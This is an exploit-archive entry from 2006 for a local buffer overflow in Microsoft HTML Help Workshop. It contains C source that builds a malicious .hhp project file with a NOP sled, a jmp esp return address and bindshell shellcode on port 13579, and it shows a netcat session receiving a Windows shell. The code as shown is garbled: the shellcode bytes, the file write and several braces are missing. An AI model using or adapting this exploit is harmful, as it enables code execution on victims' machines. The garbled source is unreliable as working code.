Microsoft HTML Help Workshop - '.hhp' Local Buffer Overflow (1)

Publish Date: 06 Feb 2006
Author: bratax
Microsoft HTML Help Workshop .hhp file Buffer Overflow Exploit
Microsoft HTML Help Workshop Buffer Overflow.
Coded by bratax (
Usage: C:\htmlws\PoC2.exe <outputfile>

C:\htmlws>poc2 new.hhp
File written.
Open with Microsoft Help Workshop to exploit.

C:\htmlws>nc -vv localhost 13579
DNS fwd/rev mismatch: RENEE != localhost
RENEE [] 13579 (?) open
Microsoft Windows XP [versie 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.


#include <stdio.h>
#include <stdlib.h>
#include <string.h>

char pre[]=
"Compatibility=1.1 or later\n"
"Compiled file=bratax.chm\n"
"Contents file=";

char end[]=
"Display compile progress=No\n"
"Language=0x813 Dutch (Belgium)\n\n\n"

char shellcode[]=
/* bindshell port 13579 thx to :) */

char overflow[15000];	// 15k just to make sure :)
int main(int argc,char *argv[])

	FILE *vuln;
	if(argc == 1)
		printf("Microsoft HTML Help Workshop Buffer Overflow.\n");
		printf("Coded by bratax (\n");
		printf("Usage: %s <outputfile>\n",argv[0]);
		return 0;
	vuln = fopen(argv[1],"w");
	//build overflow buffer here.
	memset(overflow,0x90,sizeof(overflow)); //fill with nops
	memcpy(overflow+272,"\x5d\x38\x82\x7c",4); //EIP (jmp esp)  1 of these is
	memcpy(overflow+276,"\x5d\x38\x82\x7c",4); //EIP (jmp esp)  enough but was
	memcpy(overflow+280,"\x5d\x38\x82\x7c",4); //EIP (jmp esp)  a bit lazy to
	memcpy(overflow+284,"\x5d\x38\x82\x7c",4); //EIP (jmp esp)  find out the
	memcpy(overflow+288,"\x5d\x38\x82\x7c",4); //EIP (jmp esp)	correct one :p
	memcpy(overflow+292,"\x5d\x38\x82\x7c",4); //EIP (jmp esp)
   memcpy(overflow+300,shellcode,sizeof(shellcode)); //our shellcode after some nops to land in

		//Write file
	printf("File written.\nOpen with Microsoft Help Workshop to exploit.\n");
	return 0;

// [2006-02-06]